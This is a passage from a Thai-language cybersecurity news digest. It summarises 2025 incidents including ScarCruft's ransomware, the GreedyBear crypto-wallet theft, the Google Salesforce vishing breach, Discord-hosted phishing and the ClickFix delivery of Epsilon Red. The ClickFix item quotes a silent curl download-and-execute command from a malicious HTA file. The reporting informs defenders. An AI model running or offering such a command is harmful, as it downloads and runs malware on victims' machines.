(ไม่รวมค่าไถ่) ➡️ 53% ขององค์กรสามารถกู้คืนได้ภายใน 1 สัปดาห์ ➡️ การเจรจาค่าไถ่ลดลง โดยค่าเฉลี่ยการจ่ายจริงอยู่ที่ $1M ➡️ การขาด segmentation และการไม่ทำ tabletop exercise เป็นสาเหตุที่ทำให้ CISO ถูกปลด https://www.csoonline.com/article/4040156/25-of-security-leaders-replaced-after-ransomware-attack.html

🕵️‍♂️💰 เรื่องเล่าจากโลกไซเบอร์: ScarCruft จากสายลับสู่โจรเรียกค่าไถ่ ScarCruft กลุ่มแฮกเกอร์ที่ได้รับการสนับสนุนจากรัฐบาลเกาหลีเหนือ เคยเป็นที่รู้จักในฐานะสายลับไซเบอร์ที่เน้นการขโมยข้อมูลจากหน่วยงานรัฐบาลและบุคคลสำคัญในเกาหลีใต้ ญี่ปุ่น และรัสเซีย แต่ในเดือนกรกฎาคม 2025 พวกเขาเปลี่ยนแนวทางครั้งใหญ่ โดยหันมาใช้มัลแวร์เรียกค่าไถ่ (ransomware) ชื่อว่า VCD เพื่อโจมตีแบบหวังผลทางการเงิน การโจมตีครั้งนี้ดำเนินการโดยกลุ่มย่อยชื่อ ChinopuNK ผ่านอีเมลฟิชชิ่งที่แนบไฟล์ปลอมซึ่งแอบอ้างว่าเป็นการอัปเดตรหัสไปรษณีย์ เมื่อเหยื่อเปิดไฟล์จะถูกติดตั้งมัลแวร์มากกว่า 9 ชนิด รวมถึง ChillyChino รุ่นใหม่, LightPeek, FadeStealer และ NubSpy ซึ่งเป็น backdoor ที่เขียนด้วยภาษา Rust และใช้บริการ PubNub เพื่อซ่อนการสื่อสารให้ดูเหมือนทราฟฟิกปกติ ที่น่าตกใจคือ VCD ransomware ไม่เพียงเข้ารหัสไฟล์ของเหยื่อ แต่ยังแสดงข้อความเรียกค่าไถ่ทั้งภาษาอังกฤษและเกาหลี สะท้อนว่าพวกเขาเตรียมพร้อมโจมตีทั้งในประเทศและต่างประเทศ นักวิเคราะห์จาก DeepTempo เตือนว่า การใช้ ransomware อาจไม่ใช่แค่การหาเงิน แต่เป็นการเบี่ยงเบนความสนใจจากการขโมยข้อมูล หรือใช้กดดันทางการเมือง ซึ่งเป็นแนวโน้มใหม่ของกลุ่ม APT ที่ผสมผสานการจารกรรมกับอาชญากรรมไซเบอร์ ✅ ScarCruft เปลี่ยนจากการจารกรรมมาใช้ ransomware ชื่อ VCD ➡️ เป็นการโจมตีแบบหวังผลทางการเงินครั้งแรกของกลุ่ม ✅ การโจมตีดำเนินการโดยกลุ่มย่อย ChinopuNK ➡️ ใช้อีเมลฟิชชิ่งปลอมเป็นไฟล์อัปเดตรหัสไปรษณีย์ ✅ มัลแวร์ที่ใช้มีมากกว่า 9 ชนิด รวมถึง ChillyChino รุ่นใหม่ ➡️ และ backdoor NubSpy ที่เขียนด้วยภาษา Rust ✅ NubSpy ใช้ PubNub เพื่อซ่อนการสื่อสารให้ดูเหมือนปกติ ➡️ ทำให้ตรวจจับได้ยาก ✅ VCD ransomware เข้ารหัสไฟล์และแสดงข้อความเรียกค่าไถ่ ➡️ มีทั้งภาษาอังกฤษและเกาหลี ✅ นักวิเคราะห์ชี้ว่า ransomware อาจใช้เป็นเครื่องมือเบี่ยงเบนหรือกดดัน ➡️ ไม่ใช่แค่การหาเงิน แต่เป็นยุทธศาสตร์หลายชั้น https://hackread.com/north-korean-group-scarcruft-spying-ransomware-attacks/

🕵️‍♂️💰 เรื่องเล่าจากโลกไซเบอร์: GreedyBear กับแผนโจรกรรมคริปโตระดับอุตสาหกรรม ในโลกที่คริปโตกลายเป็นสินทรัพย์ยอดนิยม กลุ่มอาชญากรไซเบอร์ก็ไม่พลาดที่จะตามกระแส ล่าสุดมีการเปิดโปงแคมเปญชื่อว่า “GreedyBear” ซึ่งขโมยเงินคริปโตไปแล้วกว่า 1 ล้านดอลลาร์ โดยใช้วิธีโจมตีแบบสามชั้นที่ซับซ้อนและอันตราย กลุ่มนี้เริ่มจากการสร้างส่วนขยายปลอมใน Firefox Marketplace มากกว่า 150 รายการ โดยปลอมเป็นกระเป๋าคริปโตยอดนิยม เช่น MetaMask, TronLink, Exodus และ Rabby Wallet พวกเขาใช้เทคนิค “Extension Hollowing” คืออัปโหลดส่วนขยายที่ดูปลอดภัยก่อน แล้วค่อยเปลี่ยนชื่อ ไอคอน และฝังโค้ดอันตรายเข้าไปภายหลัง โดยยังคงรีวิวดี ๆ ไว้เหมือนเดิม นอกจากนั้น GreedyBear ยังปล่อยมัลแวร์กว่า 500 ตัวผ่านเว็บไซต์แจกโปรแกรมเถื่อน โดยมีทั้ง credential stealers และ ransomware ที่ล็อกไฟล์และเรียกค่าไถ่เป็นคริปโต และสุดท้ายคือการสร้างเว็บไซต์ปลอมที่ดูเหมือนบริการกระเป๋าคริปโตหรือเครื่องมือซ่อมกระเป๋า เพื่อหลอกให้ผู้ใช้กรอกข้อมูลสำคัญ ทั้งหมดนี้ถูกควบคุมผ่านเซิร์ฟเวอร์เดียว (IP: 185.208.156.66) ซึ่งทำให้การจัดการแคมเปญเป็นไปอย่างมีประสิทธิภาพ และยังมีหลักฐานว่าใช้โค้ดที่สร้างด้วย AI เพื่อเร่งการโจมตีและปรับเปลี่ยนรูปแบบได้อย่างรวดเร็ว ✅ GreedyBear เป็นแคมเปญอาชญากรรมไซเบอร์ที่ขโมยคริปโตไปแล้วกว่า $1 ล้าน ➡️ ใช้วิธีโจมตีหลายรูปแบบพร้อมกัน ✅ มีส่วนขยายปลอมใน Firefox Marketplace มากกว่า 150 รายการ ➡️ ปลอมเป็นกระเป๋าคริปโตยอดนิยม เช่น MetaMask, TronLink, Exodus ✅ ใช้เทคนิค Extension Hollowing เพื่อหลบการตรวจสอบ ➡️ อัปโหลดส่วนขยายปลอดภัยก่อน แล้วค่อยเปลี่ยนเป็นอันตราย ✅ ปล่อยมัลแวร์กว่า 500 ตัวผ่านเว็บไซต์แจกโปรแกรมเถื่อน ➡️ มีทั้ง LummaStealer และ Luca Stealer ที่เน้นขโมยข้อมูลคริปโต ✅ สร้างเว็บไซต์ปลอมที่ดูเหมือนบริการกระเป๋าคริปโตหรือซ่อมกระเป๋า ➡️ หลอกให้ผู้ใช้กรอก seed phrase และ private key ✅ ทุกการโจมตีเชื่อมโยงกับเซิร์ฟเวอร์เดียว (185.208.156.66) ➡️ ใช้เป็นศูนย์กลางควบคุมและเก็บข้อมูล ✅ มีการใช้โค้ดที่สร้างด้วย AI เพื่อเร่งการโจมตี ➡️ ทำให้ปรับเปลี่ยนรูปแบบได้รวดเร็วและหลบหลีกการป้องกัน ✅ Extension Hollowing เป็นเทคนิคที่เริ่มใช้ในมัลแวร์ระดับองค์กร ➡️ เคยพบในแคมเปญโจมตีของกลุ่ม APT เช่น Lazarus ✅ Mozilla มีระบบตรวจสอบส่วนขยาย แต่ยังไม่สามารถกันการเปลี่ยนแปลงภายหลังได้ ➡️ ผู้ใช้ต้องตรวจสอบผู้พัฒนาและรีวิวอย่างละเอียด ✅ การใช้ AI ในการสร้างมัลแวร์เริ่มแพร่หลายมากขึ้น ➡️ ทำให้การตรวจจับด้วย signature-based antivirus ไม่เพียงพอ ✅ การโจมตีแบบหลายชั้น (multi-vector attack) เป็นแนวโน้มใหม่ของอาชญากรรมไซเบอร์ ➡️ เน้นการหลอกลวงจากหลายช่องทางพร้อมกันเพื่อเพิ่มโอกาสสำเร็จ https://hackread.com/greedybear-fake-crypto-wallet-extensions-firefox-marketplace/

📞🕵️‍♂️ เรื่องเล่าจากโลกไซเบอร์: เมื่อ Google ถูกหลอกด้วยเสียง และข้อมูลลูกค้าก็หลุดไป ในเดือนมิถุนายน 2025 Google ได้ยืนยันว่าเกิดเหตุข้อมูลรั่วไหลจากระบบ Salesforce ภายในของบริษัท ซึ่งใช้เก็บข้อมูลลูกค้าธุรกิจขนาดกลางและขนาดเล็ก โดยกลุ่มแฮกเกอร์ชื่อดัง ShinyHunters (หรือ UNC6040) ใช้เทคนิค “vishing” หรือการหลอกลวงผ่านเสียงโทรศัพท์ เพื่อหลอกพนักงานให้อนุมัติแอปปลอมที่แฝงตัวเป็นเครื่องมือ Salesforce Data Loader เมื่อได้รับสิทธิ์เข้าถึงแล้ว แฮกเกอร์สามารถดูดข้อมูลออกจากระบบได้ในช่วงเวลาสั้น ๆ ก่อนที่ Google จะตรวจพบและตัดการเข้าถึง โดยข้อมูลที่ถูกขโมยนั้นเป็นข้อมูลพื้นฐาน เช่น ชื่อบริษัท เบอร์โทร และโน้ตประกอบ ซึ่ง Google ระบุว่าเป็นข้อมูลที่ “ส่วนใหญ่เปิดเผยอยู่แล้ว” อย่างไรก็ตาม เหตุการณ์นี้สะท้อนถึงความเปราะบางของระบบที่พึ่งพามนุษย์เป็นด่านแรก และเป็นส่วนหนึ่งของแคมเปญโจมตีที่กว้างขึ้น ซึ่งมีเป้าหมายเป็นบริษัทที่ใช้ Salesforce เช่น Chanel, Dior, Pandora, Qantas และ Allianz โดยกลุ่ม UNC6240 ซึ่งเชื่อว่าเป็นแขนงของ ShinyHunters จะตามมาด้วยการขู่เรียกค่าไถ่ภายใน 72 ชั่วโมง พร้อมขู่ว่าจะเปิดเผยข้อมูลผ่านเว็บไซต์ “Data Leak Site” ✅ Google ยืนยันว่าระบบ Salesforce ภายในถูกเจาะข้อมูล ➡️ เกิดขึ้นในเดือนมิถุนายน 2025 โดยกลุ่ม UNC6040 ✅ ข้อมูลที่ถูกขโมยเป็นข้อมูลพื้นฐานของลูกค้าธุรกิจ SMB ➡️ เช่น ชื่อบริษัท เบอร์โทร และโน้ตประกอบ ✅ แฮกเกอร์ใช้เทคนิค vishing หลอกพนักงานผ่านโทรศัพท์ ➡️ โดยปลอมตัวเป็นฝ่าย IT และให้ติดตั้งแอปปลอม ✅ แอปปลอมถูกระบุว่าเป็น Salesforce Data Loader หรือชื่อหลอกเช่น “My Ticket Portal” ➡️ ใช้ OAuth เพื่อเข้าถึงข้อมูลโดยไม่ถูกตรวจจับ ✅ Google ตัดการเข้าถึงได้ภายใน “ช่วงเวลาสั้น ๆ” ➡️ และแจ้งลูกค้าที่ได้รับผลกระทบทันที ✅ กลุ่ม UNC6240 ตามมาด้วยการขู่เรียกค่าไถ่ ➡️ โดยส่งอีเมลหรือโทรศัพท์เรียกเงินในรูปแบบ Bitcoin ภายใน 72 ชั่วโมง ✅ ShinyHunters เคยโจมตี Snowflake, AT&T, PowerSchool และ Oracle Cloud ➡️ เป็นกลุ่มที่มีประวัติการเจาะระบบระดับสูง ✅ Salesforce ยืนยันว่าแพลตฟอร์มไม่มีช่องโหว่ ➡️ ปัญหาเกิดจากการหลอกลวงผู้ใช้ ไม่ใช่ระบบ ✅ การเชื่อมต่อแอปภายนอกใน Salesforce ใช้รหัส 8 หลัก ➡️ เป็นช่องทางที่แฮกเกอร์ใช้หลอกให้เชื่อมต่อกับแอปปลอม ✅ บริษัทที่ตกเป็นเหยื่อมีทั้งแบรนด์หรูและสายการบิน ➡️ เช่น Chanel, Dior, Louis Vuitton, Qantas และ Allianz ✅ Google แนะนำให้ใช้ MFA, จำกัดสิทธิ์ และฝึกอบรมพนักงาน ➡️ เพื่อป้องกันการโจมตีแบบ social engineering https://hackread.com/google-salesforce-data-breach-shinyhunters-vishing-scam/

🕵️‍♂️📎 เรื่องเล่าจากโลกไซเบอร์: เมื่อ Discord กลายเป็นประตูหลังให้แฮกเกอร์ผ่าน OneDrive ปลอม ในยุคที่ทุกคนคุ้นเคยกับการแชร์ไฟล์ผ่าน OneDrive และใช้ Discord เป็นช่องทางสื่อสารหลัก แฮกเกอร์ก็ใช้ความคุ้นเคยนี้เป็นเครื่องมือโจมตีแบบแนบเนียน ล่าสุด Sublime Security พบแคมเปญฟิชชิ่งที่ใช้ลิงก์จาก Discord CDN ปลอมตัวเป็นไฟล์จาก OneDrive เพื่อหลอกให้เหยื่อดาวน์โหลดมัลแวร์ แฮกเกอร์ส่งอีเมลจากบัญชีที่ถูกเจาะแล้ว โดยปลอมเป็นข้อความแจ้งเตือนจาก OneDrive พร้อมไอคอน Word และ footer ที่ดูเหมือนของจริง แต่ลิงก์ในอีเมลนั้นไม่ได้พาไปโหลดไฟล์ .docx อย่างที่อ้าง กลับเป็นไฟล์ .msi ที่ซ่อนมัลแวร์ไว้ เมื่อเหยื่อคลิกและติดตั้งไฟล์นั้น จะมีโปรแกรมควบคุมระยะไกล (RMM) สองตัวถูกติดตั้งพร้อมกัน ได้แก่ Atera ที่ติดตั้งแบบเห็นได้ชัด และ Splashtop Streamer ที่ทำงานเงียบ ๆ เบื้องหลัง พร้อมกับ .NET Runtime 8 ทั้งหมดนี้ถูกโหลดจากแหล่งที่ดูน่าเชื่อถือ ทำให้ยากต่อการตรวจจับ การใช้ RMM แบบหลายตัวช่วยให้แฮกเกอร์รักษาการควบคุมเครื่องแม้จะมีการตรวจพบบางส่วน และสามารถใช้เครื่องเหยื่อในการขโมยข้อมูล เรียกค่าไถ่ หรือเป็นฐานส่งมัลแวร์ต่อไป นอกจากนี้ยังมีแคมเปญอื่นที่ใช้ Discord CDN เพื่อส่งไฟล์ลัดที่เรียก PowerShell ดาวน์โหลดมัลแวร์จากลิงก์ที่ถูกดัดแปลงให้หลบการตรวจจับได้ ทำให้ Discord ซึ่งเป็นแพลตฟอร์มที่เชื่อถือได้ กลายเป็นช่องทางโจมตีที่อันตรายอย่างคาดไม่ถึง ✅ พบแคมเปญฟิชชิ่งปลอมเป็น OneDrive โดยใช้ Discord CDN เป็นที่เก็บไฟล์ ➡️ อีเมลปลอมมีไอคอน Word และ footer ที่ดูเหมือนของจริง ✅ ไฟล์ที่โหลดเป็น .msi แทนที่จะเป็น .docx ตามที่อ้าง ➡️ ใช้เทคนิค file extension manipulation เพื่อหลอกเหยื่อ ✅ ติดตั้ง RMM สองตัวคือ Atera และ Splashtop Streamer ➡️ Atera ติดตั้งแบบเห็นได้ชัด ส่วน Splashtop ทำงานเงียบ ๆ ✅ ใช้ .NET Runtime 8 เพื่อเสริมการทำงานของมัลแวร์ ➡️ ทั้งหมดโหลดจากแหล่งที่ดูปลอดภัย ทำให้ตรวจจับยาก ✅ Sublime Security ตรวจพบด้วยระบบ AI ที่วิเคราะห์พฤติกรรมอีเมล ➡️ เช่น การส่งถึงผู้รับไม่เปิดเผย และการใช้ลิงก์จาก Discord CDN ✅ Discord CDN ถูกใช้ในหลายแคมเปญมัลแวร์ช่วงปี 2024–2025 ➡️ เช่นการฝัง PowerShell shortcut ในไฟล์ zip เพื่อโหลดมัลแวร์ ✅ แฮกเกอร์ใช้เทคนิค URL obfuscation เพื่อหลบการตรวจจับ ➡️ เช่นการแทนที่บางส่วนของลิงก์เพื่อให้ระบบความปลอดภัยมองข้าม ✅ RMM เป็นเครื่องมือที่ถูกต้องตามกฎหมายแต่ถูกนำไปใช้ในทางร้าย ➡️ ใช้ควบคุมเครื่องเหยื่อจากระยะไกลโดยไม่ต้องใช้ backdoor ✅ การโจมตีแบบ multi-stage ช่วยให้แฮกเกอร์รักษาการควบคุมได้ยาวนาน ➡️ แม้จะมีการลบโปรแกรมบางตัว ก็ยังมีอีกตัวทำงานอยู่ https://hackread.com/discord-cdn-link-deliver-rat-disguised-onedrive-file/

🎙️ เรื่องเล่าจากข่าว: Everest Ransomware กับการโจมตี Mailchimp ที่กลายเป็นเรื่องตลกในวงการไซเบอร์ ปลายเดือนกรกฎาคม 2025 กลุ่ม Everest ransomware ได้โพสต์บนเว็บไซต์มืดว่า พวกเขาเจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลชื่อดัง—และขโมยข้อมูลขนาด 767 MB รวม 943,536 บรรทัด ซึ่งอ้างว่าเป็น “เอกสารภายในบริษัท” และ “ข้อมูลส่วนตัวของลูกค้า” แต่เมื่อผู้เชี่ยวชาญด้านความปลอดภัยได้ตรวจสอบตัวอย่างข้อมูล พบว่าเป็นเพียงข้อมูลธุรกิจทั่วไป เช่น อีเมลบริษัท, โดเมน, เบอร์โทร, เมือง, ประเทศ, ลิงก์โซเชียลมีเดีย และเทคโนโลยีที่ใช้ ไม่ใช่ข้อมูลลับหรือข้อมูลภายในที่สำคัญของ Mailchimp ชุมชนไซเบอร์จึงพากันหัวเราะเยาะการโจมตีครั้งนี้ โดยเปรียบเทียบว่า “เหมือนข้อมูลของลูกค้าคนเดียว” หรือ “แค่เศษเสี้ยวของข้อมูลที่ Mailchimp ส่งออกในหนึ่งวินาที” แม้จะดูเล็กน้อย แต่การโจมตีนี้ยังสะท้อนแนวโน้มที่น่ากังวล—การเพิ่มขึ้นของ ransomware ทั่วโลกในเดือนกรกฎาคม โดยมีหลายกลุ่มโจมตีองค์กรใหญ่ เช่น Dollar Tree, Albavision และ NASCAR ✅ Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 767 MB รวม 943,536 บรรทัด ➡️ อ้างว่าเป็นเอกสารภายในและข้อมูลลูกค้า ➡️ โพสต์บนเว็บไซต์มืดพร้อมตัวอย่างข้อมูล ✅ ข้อมูลที่หลุดเป็นข้อมูลธุรกิจทั่วไป ไม่ใช่ข้อมูลลับของ Mailchimp ➡️ เช่น อีเมลบริษัท, โดเมน, เบอร์โทร, เทคโนโลยีที่ใช้ ➡️ ดูเหมือนมาจากการ export จากระบบ CRM มากกว่าระบบภายใน ✅ ชุมชนผู้เชี่ยวชาญด้านไซเบอร์เยาะเย้ยการโจมตีครั้งนี้ว่า “เล็กเกินคาด” ➡️ เปรียบเทียบว่าเป็นข้อมูลของลูกค้าคนเดียว ➡️ คาดหวังว่าจะมีข้อมูลระดับ GB หรือ TB จากบริษัทใหญ่แบบ Mailchimp ✅ Everest ransomware เคยโจมตีบริษัทใหญ่มาแล้ว เช่น Coca-Cola และรัฐบาลในอเมริกาใต้ ➡️ ใช้โมเดล double extortion: เข้ารหัสไฟล์ + ขู่เปิดเผยข้อมูล ➡️ ล่าสุดเริ่มขายสิทธิ์เข้าถึงระบบให้กลุ่มอื่นแทนการโจมตีเอง ✅ การโจมตี Mailchimp เป็นส่วนหนึ่งของคลื่น ransomware ที่พุ่งสูงในเดือนกรกฎาคม 2025 ➡️ INC ransomware อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree ➡️ GLOBAL GROUP โจมตี Albavision ได้ข้อมูล 400 GB ➡️ Medusa ransomware เรียกค่าไถ่ NASCAR มูลค่า $4 ล้าน https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/

🎙️ เรื่องเล่าจากข่าว: Dollar Tree ปฏิเสธการถูกแฮก—แต่ข้อมูลที่หลุดอาจมาจากอดีตคู่แข่งที่ล้มละลาย INC Ransom ซึ่งเป็นกลุ่มแรนซัมแวร์ที่มีประวัติการโจมตีองค์กรทั่วโลก ได้โพสต์ชื่อ Dollar Tree บนเว็บไซต์ของตน พร้อมอ้างว่าได้ขโมยข้อมูลกว่า 1.2TB ซึ่งรวมถึงเอกสารสำคัญและข้อมูลส่วนบุคคล เช่น สแกนหนังสือเดินทาง และขู่ว่าจะเปิดเผยหากไม่จ่ายค่าไถ่ แต่ Dollar Tree ออกแถลงการณ์ปฏิเสธทันที โดยระบุว่า “ข้อมูลที่หลุดนั้นเป็นของ 99 Cents Only” ซึ่งเป็นบริษัทคู่แข่งที่ล้มละลายไปในปี 2024 และ Dollar Tree ได้ซื้อสิทธิ์การเช่าอาคารบางแห่งมาเปิดร้านใหม่เท่านั้น ไม่ได้ซื้อระบบหรือฐานข้อมูลของบริษัทนั้นแต่อย่างใด 99 Cents Only ปิดกิจการทั้งหมด 371 สาขา และไม่มีช่องทางติดต่อแล้ว ทำให้ไม่สามารถยืนยันข้อมูลจากฝั่งนั้นได้ ขณะที่ Dollar Tree ยืนยันว่า “ไม่มีการเจาะระบบของเรา” และ “ไม่มีการซื้อข้อมูลหรือระบบจาก 99 Cents Only” ✅ INC Ransom อ้างว่าเจาะระบบ Dollar Tree และขโมยข้อมูล 1.2TB ➡️ รวมถึงข้อมูลส่วนบุคคล เช่น สแกนหนังสือเดินทาง ➡️ ขู่ว่าจะเปิดเผยข้อมูลหากไม่จ่ายค่าไถ่ ✅ Dollar Tree ปฏิเสธการถูกแฮก และระบุว่าข้อมูลนั้นเป็นของ 99 Cents Only ➡️ บริษัทคู่แข่งที่ล้มละลายไปในปี 2024 ➡️ Dollar Tree ซื้อแค่สิทธิ์การเช่าอาคาร ไม่ได้ซื้อระบบหรือข้อมูล ✅ 99 Cents Only ปิดกิจการทั้งหมด 371 สาขา และไม่มีช่องทางติดต่อแล้ว ➡️ Dollar Tree เปิดร้านใหม่ในอาคารเดิม 170 แห่ง ➡️ ไม่มีการรวมระบบหรือฐานข้อมูลของบริษัทเดิม ✅ Dollar Tree เป็นบริษัทค้าปลีกขนาดใหญ่ มีรายได้กว่า $17.6 พันล้านในปี 2024 ➡️ มีสาขากว่า 15,000 แห่งในสหรัฐฯ และแคนาดา ➡️ มีพนักงานมากกว่า 65,000 คน ✅ INC Ransom เป็นกลุ่มแรนซัมแวร์แบบ multi-extortion ที่โจมตีองค์กรทั่วโลก ➡️ เคยโจมตีองค์กรในภาครัฐ การศึกษา และสุขภาพ ➡️ ใช้เทคนิคขู่เปิดเผยข้อมูลเพื่อเรียกค่าไถ่ ✅ 99 Cents Only ยื่นล้มละลายในเดือนเมษายน 2024 จากผลกระทบของเงินเฟ้อ โควิด และการแข่งขันที่รุนแรง ➡️ ปิดกิจการทั้งหมดภายในกลางปี 2024 ➡️ เป็นหนึ่งในบริษัทค้าปลีกที่ล้มละลายจากภาวะเศรษฐกิจ ✅ INC Ransom เคยโจมตีองค์กรระดับสูง เช่น Stark AeroSpace และ Xerox Corporation ➡️ ไม่เลือกเป้าหมายเฉพาะเจาะจง ➡️ มีเหยื่อมากกว่า 200 รายในช่วง 12 เดือนที่ผ่านมา ✅ การโจมตีแบบ multi-extortion คือการขโมยข้อมูล + ขู่เปิดเผย + เรียกค่าไถ่ ➡️ เป็นรูปแบบที่เพิ่มแรงกดดันให้เหยื่อยอมจ่าย ➡️ ต้องมีระบบป้องกันและแผนตอบสนองที่ชัดเจน ✅ การซื้อกิจการหรือทรัพย์สินจากบริษัทที่ล้มละลายต้องมีการตรวจสอบความปลอดภัยของข้อมูลอย่างเข้มงวด ➡️ ไม่ใช่แค่ตรวจสอบทรัพย์สินทางกายภาพ แต่ต้องรวมถึงระบบดิจิทัล ➡️ ควรมีการล้างข้อมูลและ audit ก่อนนำมาใช้งาน ‼️ แม้ Dollar Tree จะไม่ถูกเจาะโดยตรง แต่ข้อมูลจาก 99 Cents Only อาจมีความเกี่ยวข้องกับลูกค้าเดิมหรือพนักงานที่ยังมีผลกระทบ ⛔ หากข้อมูลนั้นยังมีความเชื่อมโยงกับระบบที่ Dollar Tree ใช้ อาจเกิดความเสี่ยง ⛔ ต้องตรวจสอบว่าไม่มีการนำข้อมูลเดิมมาใช้ซ้ำในระบบใหม่ ‼️ การซื้อสิทธิ์เช่าอาคารโดยไม่ซื้อระบบ ไม่ได้หมายความว่าข้อมูลจะปลอดภัยเสมอไป ⛔ หากมีการโอนอุปกรณ์หรือเซิร์ฟเวอร์โดยไม่ได้ล้างข้อมูล อาจเกิดการรั่วไหล ⛔ ต้องมีการตรวจสอบทรัพย์สินดิจิทัลอย่างละเอียดก่อนนำมาใช้งาน ‼️ การปฏิเสธการถูกแฮกอาจไม่เพียงพอ หากไม่มีการตรวจสอบระบบอย่างโปร่งใส ⛔ ควรมีการเปิดเผยผลการตรวจสอบจากผู้เชี่ยวชาญภายนอก ⛔ เพื่อสร้างความเชื่อมั่นให้กับลูกค้าและพันธมิตร ‼️ การโจมตีแบบ multi-extortion ของ INC Ransom อาจยังดำเนินต่อไป แม้บริษัทจะไม่จ่ายค่าไถ่ ⛔ ข้อมูลอาจถูกเปิดเผยในอนาคตเพื่อกดดันเพิ่มเติม ⛔ ต้องเตรียมแผนรับมือด้านสื่อและกฎหมายล่วงหน้า https://www.techradar.com/pro/security/dollar-tree-denies-data-breach-says-hacker-targeted-its-rival-instead

🧠 เรื่องเล่าจากข่าว: “Mailchimp โดนเจาะ” กับเบื้องหลังของ Everest ที่ไม่ธรรมดา Everest ransomware เป็นกลุ่มแฮกเกอร์ที่ใช้โมเดล “double extortion” คือเข้ารหัสไฟล์ของเหยื่อ และขโมยข้อมูลไปเผยแพร่เพื่อกดดันให้จ่ายค่าไถ่ ล่าสุดพวกเขาอ้างว่าได้เจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลที่มีผู้ใช้กว่า 14 ล้านรายทั่วโลก ข้อมูลที่ถูกขโมยมีขนาด 767 MB รวมกว่า 943,536 บรรทัด ซึ่งดูเหมือนจะเป็นข้อมูลจากระบบ CRM หรือการส่งออกจากฐานข้อมูลลูกค้า มากกว่าจะเป็นข้อมูลภายในของ Mailchimp เอง เช่น ชื่อบริษัท, อีเมล, เบอร์โทร, โดเมน, เทคโนโลยีที่ใช้ (Shopify, WordPress, Google Cloud ฯลฯ) แม้จะไม่ใช่การเจาะระบบหลัก แต่การโจมตีนี้เกิดขึ้นในช่วงที่แรนซัมแวร์กำลังระบาดหนัก—ในเวลาใกล้กัน INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree และ GLOBAL GROUP อ้างว่าเจาะ Albavisión ได้ 400 GB ส่วน Medusa ก็เรียกค่าไถ่ NASCAR ถึง $4 ล้าน ✅ Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 943,536 รายการ ➡️ ขนาดไฟล์รวม 767 MB ถูกเผยแพร่บน dark web ➡️ ข้อมูลดูเหมือนมาจากระบบ CRM ไม่ใช่ระบบภายในของ Mailchimp ✅ ข้อมูลที่รั่วไหลประกอบด้วยข้อมูลธุรกิจ เช่น โดเมน, อีเมล, เบอร์โทร, เทคโนโลยีที่ใช้ ➡️ มีข้อมูลเกี่ยวกับ GDPR, โซเชียลมีเดีย, และผู้ให้บริการ hosting ➡️ จัดเรียงแบบ spreadsheet แสดงว่าอาจมาจากการส่งออกข้อมูลลูกค้า ✅ Everest ใช้โมเดล double extortion—เข้ารหัสไฟล์และขู่เปิดเผยข้อมูล ➡️ เคยโจมตี Coca-Cola ในเดือนพฤษภาคม 2025 และเผยแพร่ข้อมูลพนักงาน ➡️ ใช้ dark web leak site เป็นเครื่องมือกดดันเหยื่อ ✅ Mailchimp เป็นบริษัทใหญ่ที่มีผู้ใช้กว่า 14 ล้านราย และถูก Intuit ซื้อกิจการในปี 2021 ➡️ มีรายได้ปีละ $61 พันล้าน และถือครองตลาดอีเมลถึง 2 ใน 3 ➡️ การโจมตีแม้จะเล็ก แต่กระทบต่อภาพลักษณ์และความเชื่อมั่น ✅ ในเดือนกรกฎาคม 2025 มีการโจมตีหลายกรณีที่น่าจับตา ➡️ INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree ➡️ GLOBAL GROUP เจาะ Albavisión ได้ 400 GB ➡️ Medusa เรียกค่าไถ่ NASCAR $4 ล้าน พร้อมขู่เปิดเผยข้อมูล https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/

🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware 